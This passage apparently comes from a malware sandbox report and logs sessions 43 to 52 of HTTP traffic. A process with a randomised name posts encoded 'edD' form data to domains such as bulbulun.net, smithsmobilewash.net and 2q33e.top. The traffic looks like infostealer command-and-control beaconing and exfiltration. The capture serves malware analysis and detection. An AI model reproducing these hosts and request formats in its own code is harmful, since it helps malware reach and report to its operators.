                                                                                                                                43 | 192.168.2.8 | 49751 | 95.216.25.89 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:56:50.294167042 CET | 1715 | OUT | POST /taxt/ HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.bulbulun.net
                                                                                                                                Referer: http://www.bulbulun.net/taxt/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=[TRUNCATED]
                                                                                                                                Oct 29, 2024 16:56:51.149471998 CET | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:51 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                44 | 192.168.2.8 | 49752 | 95.216.25.89 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:56:52.841475964 CET | 427 | OUT | GET /taxt/?edD=r1Iubw6Wh8IGmXw0YJVaMoRCD3peRXEmz6ievL1zkHtXMQX/g3sK5IHJ6rQ7ggOc23QC6zmWJBnuHS8GGugfDzOdB1VYvGABqxLnspqtMyj1CdMgVpHhi3ZxRPJaa26iDA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:56:53.693489075 CET360INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:53 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49753 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:56:59.095247030 CET | 702 | OUT | POST /trf9/ HTTP/1.1
Host: www.smithsmobilewash.net
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.smithsmobilewash.net
Referer: http://www.smithsmobilewash.net/trf9/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 204
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 66 56 65 49 42 4f 57 6f 2f 4f 4d 4a 77 39 31 4d 71 62 63 52 65 43 68 72 6e 65 51 6c 4b 5a 4e 78 47 44 47 49 64 73 59 39 41 46 4e 47 51 65 62 33 33 38 42 69 32 44 32 61 65 36 46 62 5a 63 4f 6d 74 6c 70 4f 79 54 65 44 66 43 44 48 5a 30 49 35 61 37 38 32 35 7a 57 62 33 59 50 4b 38 66 74 56 36 4d 70 6d 6b 68 4c 7a 4b 78 48 65 59 53 6d 77 4f 75 30 78 59 4d 56 2f 71 4b 58 42 55 6e 6c 36 73 6b 6a 51 4d 6e 4b 43 2b 34 49 69 59 58 7a 30 51 57 65 31 75 76 53 67 5a 64 30 72 49 63 53 43 33 34 54 55 6a 6f 4f 41 6f 53 58 59 66 78 39 70 41 6e 59 78 2f 63 42 32 64 6a 68 79 58 6b 64 35 2f 75 49 30 73 43 51 3d
Data Ascii: edD=fVeIBOWo/OMJw91MqbcReChrneQlKZNxGDGIdsY9AFNGQeb338Bi2D2ae6FbZcOmtlpOyTeDfCDHZ0I5a7825zWb3YPK8ftV6MpmkhLzKxHeYSmwOu0xYMV/qKXBUnl6skjQMnKC+4IiYXz0QWe1uvSgZd0rIcSC34TUjoOAoSXYfx9pAnYx/cB2djhyXkd5/uI0sCQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49754 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:57:01.641539097 CET | 722 | OUT | POST /trf9/ HTTP/1.1
Host: www.smithsmobilewash.net
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.smithsmobilewash.net
Referer: http://www.smithsmobilewash.net/trf9/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 224
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 66 56 65 49 42 4f 57 6f 2f 4f 4d 4a 2f 38 6c 4d 6f 36 63 52 50 53 68 6f 74 2b 51 6c 63 70 4e 39 47 44 61 49 64 6f 49 54 42 77 56 47 58 2b 72 33 77 35 31 69 34 6a 32 61 56 61 46 53 57 38 50 6b 74 6c 6c 38 79 57 2b 44 66 43 48 48 5a 31 59 35 5a 4b 38 78 37 6a 57 4f 36 34 50 4d 79 2f 74 56 36 4d 70 6d 6b 68 65 57 4b 78 66 65 62 6a 57 77 4f 4b 59 2b 47 38 56 38 74 4b 58 42 48 33 6c 2b 73 6b 69 44 4d 6c 7a 76 2b 2b 4d 69 59 54 2f 30 52 48 65 71 6b 76 53 69 64 64 31 50 59 5a 37 54 32 61 61 79 6d 75 65 6c 78 67 6e 65 54 6e 4d 44 61 46 51 33 38 63 70 64 64 67 4a 45 53 54 41 52 6c 4e 59 45 79 56 48 2f 71 74 79 4c 4a 48 56 47 63 43 4b 54 50 30 50 35 72 55 46 42
Data Ascii: edD=fVeIBOWo/OMJ/8lMo6cRPShot+QlcpN9GDaIdoITBwVGX+r3w51i4j2aVaFSW8Pktll8yW+DfCHHZ1Y5ZK8x7jWO64PMy/tV6MpmkheWKxfebjWwOKY+G8V8tKXBH3l+skiDMlzv++MiYT/0RHeqkvSidd1PYZ7T2aaymuelxgneTnMDaFQ38cpddgJESTARlNYEyVH/qtyLJHVGcCKTP0P5rUFB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 49755 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:57:04.194065094 CET | 1739 | OUT | POST /trf9/ HTTP/1.1
Host: www.smithsmobilewash.net
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.smithsmobilewash.net
Referer: http://www.smithsmobilewash.net/trf9/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1240
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 66 56 65 49 42 4f 57 6f 2f 4f 4d 4a 2f 38 6c 4d 6f 36 63 52 50 53 68 6f 74 2b 51 6c 63 70 4e 39 47 44 61 49 64 6f 49 54 42 77 64 47 58 4e 6a 33 32 65 5a 69 37 6a 32 61 4a 71 46 66 57 38 4f 38 74 6c 39 34 79 57 79 54 66 41 76 48 59 56 45 35 52 59 45 78 68 7a 57 4f 6d 49 50 4e 38 66 74 41 36 4d 34 4f 6b 68 4f 57 4b 78 66 65 62 68 4f 77 4a 65 30 2b 45 38 56 2f 71 4b 57 56 55 6e 6c 53 73 6b 36 54 4d 6a 76 5a 2b 75 73 69 62 33 54 30 53 78 79 71 6f 76 53 6b 61 64 31 58 59 5a 2b 4c 32 5a 76 4c 6d 75 43 62 78 6a 33 65 54 68 51 59 65 45 59 4a 6d 73 4e 78 55 58 4e 4a 62 54 4d 71 6e 38 51 52 31 31 4c 37 6e 61 66 6b 66 56 45 4e 57 30 37 2f 4e 44 50 52 72 69 4d 51 36 75 64 62 62 77 5a 32 6c 45 76 69 77 78 70 7a 50 79 51 59 61 6c 48 34 58 65 47 43 48 39 42 50 49 2f 36 6c 38 76 74 56 72 31 6b 71 78 49 48 39 65 51 75 38 41 39 75 33 73 49 39 55 6d 77 33 69 30 35 31 50 6e 4f 70 50 65 51 6d 6a 55 77 72 74 62 77 73 50 53 43 50 65 4d 74 30 6c 33 65 57 43 6e 45 48 49 6b 71 70 6b 2f 46 4b 6a 78 6e 44 4a 56 65 [TRUNCATED]
Data Ascii: edD=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 49756 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:57:06.729289055 CET | 435 | OUT | GET /trf9/?edD=SX2oC5m45uYB1tV1xPAlHQ9pkf41HJggIgPCWZhvHUcjHM/w8Nd3jQ2tXPB/QOacw2gE0ne7LAGFXkFnbZ4l5ULW4r3r0ogn7NokvyLyFgbvViqVA80wJ4db34DSXGAE4g==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
Host: www.smithsmobilewash.net
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Oct 29, 2024 16:57:07.339656115 CET | 412 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 29 Oct 2024 15:57:07 GMT
Content-Type: text/html
Content-Length: 272
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 64 44 3d 53 58 32 6f 43 35 6d 34 35 75 59 42 31 74 56 31 78 50 41 6c 48 51 39 70 6b 66 34 31 48 4a 67 67 49 67 50 43 57 5a 68 76 48 55 63 6a 48 4d 2f 77 38 4e 64 33 6a 51 32 74 58 50 42 2f 51 4f 61 63 77 32 67 45 30 6e 65 37 4c 41 47 46 58 6b 46 6e 62 5a 34 6c 35 55 4c 57 34 72 33 72 30 6f 67 6e 37 4e 6f 6b 76 79 4c 79 46 67 62 76 56 69 71 56 41 38 30 77 4a 34 64 62 33 34 44 53 58 47 41 45 34 67 3d 3d 26 6d 52 52 3d 56 78 75 64 66 30 66 48 7a 4c 77 38 34 6e 33 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?edD=SX2oC5m45uYB1tV1xPAlHQ9pkf41HJggIgPCWZhvHUcjHM/w8Nd3jQ2tXPB/QOacw2gE0ne7LAGFXkFnbZ4l5ULW4r3r0ogn7NokvyLyFgbvViqVA80wJ4db34DSXGAE4g==&mRR=Vxudf0fHzLw84n3P"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 49757 | 38.47.233.52 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:57:13.112205982 CET | 669 | OUT | POST /phwy/ HTTP/1.1
Host: www.2q33e.top
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.2q33e.top
Referer: http://www.2q33e.top/phwy/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 204
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 41 4d 34 76 7a 73 53 69 65 4c 49 74 32 51 34 48 64 66 37 52 63 31 58 76 55 43 73 32 49 72 4d 44 6c 75 54 6a 69 71 73 73 6b 51 66 56 7a 62 59 45 61 6c 67 4f 48 4c 79 76 36 35 6f 69 33 58 59 68 53 38 33 33 48 44 64 2b 36 70 49 48 7a 64 61 39 77 34 6b 4a 73 4a 41 6f 54 31 71 33 46 35 76 76 6e 36 76 65 32 68 71 2b 74 37 37 4b 61 55 63 4e 59 6a 57 51 58 37 6a 2f 61 51 64 61 34 68 65 78 39 35 63 6e 7a 2b 53 44 54 53 4e 4f 79 59 65 39 43 4a 6a 4c 6c 4c 33 48 70 51 71 4d 66 36 78 76 71 44 78 64 48 77 59 4b 54 31 4f 48 44 4c 33 73 61 51 2f 75 4a 58 35 52 43 54 33 6c 69 4c 76 6d 36 36 50 48 62 56 41 3d
Data Ascii: edD=AM4vzsSieLIt2Q4Hdf7Rc1XvUCs2IrMDluTjiqsskQfVzbYEalgOHLyv65oi3XYhS833HDd+6pIHzda9w4kJsJAoT1q3F5vvn6ve2hq+t77KaUcNYjWQX7j/aQda4hex95cnz+SDTSNOyYe9CJjLlL3HpQqMf6xvqDxdHwYKT1OHDL3saQ/uJX5RCT3liLvm66PHbVA=
Oct 29, 2024 16:57:14.102221966 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 29 Oct 2024 15:57:13 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 49758 | 38.47.233.52 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:57:15.656974077 CET | 689 | OUT | POST /phwy/ HTTP/1.1
Host: www.2q33e.top
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.2q33e.top
Referer: http://www.2q33e.top/phwy/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 224
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 41 4d 34 76 7a 73 53 69 65 4c 49 74 77 44 51 48 66 2b 37 52 4a 46 58 73 4b 79 73 32 54 62 4d 59 6c 75 66 6a 69 70 68 7a 6b 43 72 56 7a 35 51 45 62 68 30 4f 41 4c 79 76 76 4a 70 6d 34 33 5a 4d 53 38 72 2f 48 43 68 2b 36 70 63 48 7a 59 32 39 7a 4a 6b 49 73 5a 41 75 49 6c 71 78 49 5a 76 76 6e 36 76 65 32 67 4f 59 74 36 54 4b 62 6b 4d 4e 4b 57 32 52 65 62 6a 38 64 51 64 61 38 68 65 31 39 35 63 2f 7a 36 79 36 54 51 31 4f 79 64 36 39 46 62 4c 4b 73 4c 33 42 6a 77 72 4a 4f 6f 59 58 76 78 39 59 45 67 51 33 51 44 53 6e 43 39 47 47 41 79 33 6f 4b 58 52 36 43 51 66 54 6e 38 79 4f 67 5a 66 33 46 43 57 39 6f 37 65 6f 4a 44 2f 61 43 42 58 6f 75 6a 4c 65 39 69 62 63
Data Ascii: edD=AM4vzsSieLItwDQHf+7RJFXsKys2TbMYlufjiphzkCrVz5QEbh0OALyvvJpm43ZMS8r/HCh+6pcHzY29zJkIsZAuIlqxIZvvn6ve2gOYt6TKbkMNKW2Rebj8dQda8he195c/z6y6TQ1Oyd69FbLKsL3BjwrJOoYXvx9YEgQ3QDSnC9GGAy3oKXR6CQfTn8yOgZf3FCW9o7eoJD/aCBXoujLe9ibc
Oct 29, 2024 16:57:16.606427908 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 29 Oct 2024 15:57:16 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                 Session ID: 51 | Source IP: 192.168.2.8 | Source Port: 49759 | Destination IP: 38.47.233.52 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:18.202681065 CET | Bytes transferred: 1706 | Direction: OUT | Data: POST /phwy/ HTTP/1.1
                                                                                                                                Host: www.2q33e.top
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2q33e.top
                                                                                                                                Referer: http://www.2q33e.top/phwy/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 41 4d 34 76 7a 73 53 69 65 4c 49 74 77 44 51 48 66 2b 37 52 4a 46 58 73 4b 79 73 32 54 62 4d 59 6c 75 66 6a 69 70 68 7a 6b 43 54 56 7a 72 6f 45 62 41 30 4f 42 4c 79 76 7a 5a 70 72 34 33 5a 30 53 38 6a 7a 48 43 74 45 36 72 6b 48 79 2b 69 39 6e 72 41 49 2f 35 41 75 58 31 71 77 46 35 76 36 6e 36 2f 61 32 68 2b 59 74 36 54 4b 62 68 49 4e 64 54 57 52 59 62 6a 2f 61 51 64 6f 34 68 66 53 39 34 30 46 7a 38 75 31 54 6a 39 4f 79 39 71 39 44 6f 6a 4b 78 37 33 44 67 77 72 76 4f 6f 45 49 76 78 68 2b 45 68 55 5a 51 45 2b 6e 43 4c 50 50 56 57 47 33 62 6b 31 33 62 43 6a 43 70 65 6d 44 6f 70 6a 66 59 44 2b 63 2b 4d 6e 4a 63 52 7a 54 57 77 4f 57 34 31 66 4b 7a 6b 6a 64 46 6e 4d 49 61 2f 68 41 35 79 43 4f 43 30 64 77 6a 51 32 57 78 32 6b 59 77 44 33 4d 36 35 39 4a 49 63 56 7a 66 56 5a 32 2f 51 4f 4d 49 6e 75 53 39 66 6e 41 6e 48 7a 4e 66 36 6f 64 48 7a 4b 44 70 78 65 57 44 37 4d 77 53 32 57 6e 4d 4b 72 71 51 54 64 54 62 47 73 39 4f 68 6d 57 50 62 48 54 5a 6a 51 47 31 57 71 66 6e 71 55 70 59 69 4d 49 64 4b [TRUNCATED]
                                                                                                                                Data Ascii: edD=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 [TRUNCATED]
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:19.216146946 CET | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:19 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                 Session ID: 52 | Source IP: 192.168.2.8 | Source Port: 49760 | Destination IP: 38.47.233.52 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:20.748868942 CET | Bytes transferred: 424 | Direction: OUT | Data: GET /phwy/?edD=NOQPwZ+XOddShCAJaqjiSDvaSyosQYNdt8f0tOcuwTalyoR7fBY1X5bax8h0+UleX8GnGxtat7FR1fTM5b1BgdcwV2K5MrO24q3i2hacl5vfdQcLdxPRe77ACw5W73Ddrw==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.2q33e.top
                                                                                                                                Accept: */*
